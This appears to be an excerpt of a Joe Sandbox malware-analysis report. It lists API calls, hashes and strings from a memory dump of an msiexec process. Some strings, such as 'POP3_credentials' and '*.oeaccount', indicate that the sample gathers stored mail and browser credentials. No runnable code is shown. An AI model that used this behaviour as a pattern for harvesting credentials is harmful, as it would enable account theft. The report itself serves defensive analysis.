                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$DialogMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2485852401-0
                                                                                                            • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                            • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                            • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                            • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                            • String ID:
                                                                                                            • API String ID: 3642520215-0
                                                                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1999381814-0
                                                                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                            • API String ID: 1297977491-3883738016
                                                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                            APIs
                                                                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID: gj
                                                                                                            • API String ID: 438689982-4203073231
                                                                                                            • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                            • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                            • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                            • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __aulldvrm$__aullrem
                                                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                            • API String ID: 643879872-978417875
                                                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040DAE3
                                                                                                            • memset.MSVCRT ref: 0040DAF7
                                                                                                            • memset.MSVCRT ref: 0040DB0B
                                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset$strlen$_memicmp
                                                                                                            • String ID: user_pref("
                                                                                                            • API String ID: 765841271-2487180061
                                                                                                            • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                            • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                            • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                            • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                            • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                            • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                            • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                            • memset.MSVCRT ref: 004058C3
                                                                                                            • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                            • SetFocus.USER32(?), ref: 00405976
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4281309102-0
                                                                                                            • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                            • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                            • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                            • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                            • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                            • sprintf.MSVCRT ref: 0040A921
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                            • API String ID: 1631269929-4153097237
                                                                                                            • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                            • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                            • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                            • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040810E
                                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,68147B60,?), ref: 004081B9
                                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                            • API String ID: 524865279-2190619648
                                                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                            • String ID: 0$6
                                                                                                            • API String ID: 2300387033-3849865405
                                                                                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004076D7
                                                                                                            • sprintf.MSVCRT ref: 00407704
                                                                                                            • strlen.MSVCRT ref: 00407710
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                            • strlen.MSVCRT ref: 00407733
                                                                                                            • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpystrlen$memsetsprintf
                                                                                                            • String ID: %s (%s)
                                                                                                            • API String ID: 3756086014-1363028141
                                                                                                            • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                            • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                            • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                            • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscat$memsetsprintf
                                                                                                            • String ID: %2.2X
                                                                                                            • API String ID: 125969286-791839006
                                                                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                            APIs
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                            • String ID: ACD
                                                                                                            • API String ID: 82305771-620537770
                                                                                                            • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                            • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004091EC
                                                                                                            • sprintf.MSVCRT ref: 00409201
                                                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                            • String ID: caption$dialog_%d
                                                                                                            • API String ID: 2923679083-4161923789
                                                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                            Strings
                                                                                                            • no such savepoint: %s, xrefs: 00426A02
                                                                                                            • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                            • abort due to ROLLBACK, xrefs: 00428781
                                                                                                            • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                            • unknown error, xrefs: 004277B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                            • API String ID: 3510742995-3035234601
                                                                                                            • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                            • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                            • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                            • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                            • API String ID: 2221118986-3608744896
                                                                                                            • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                            • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                            • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                            • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                              • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmpmemcpy
                                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                            • API String ID: 1784268899-4153596280
                                                                                                            • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                            • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                            • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                            • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                            • memset.MSVCRT ref: 00410246
                                                                                                            • memset.MSVCRT ref: 00410258
                                                                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                            • memset.MSVCRT ref: 0041033F
                                                                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 3974772901-0
                                                                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                            APIs
                                                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                            • strlen.MSVCRT ref: 004440D1
                                                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
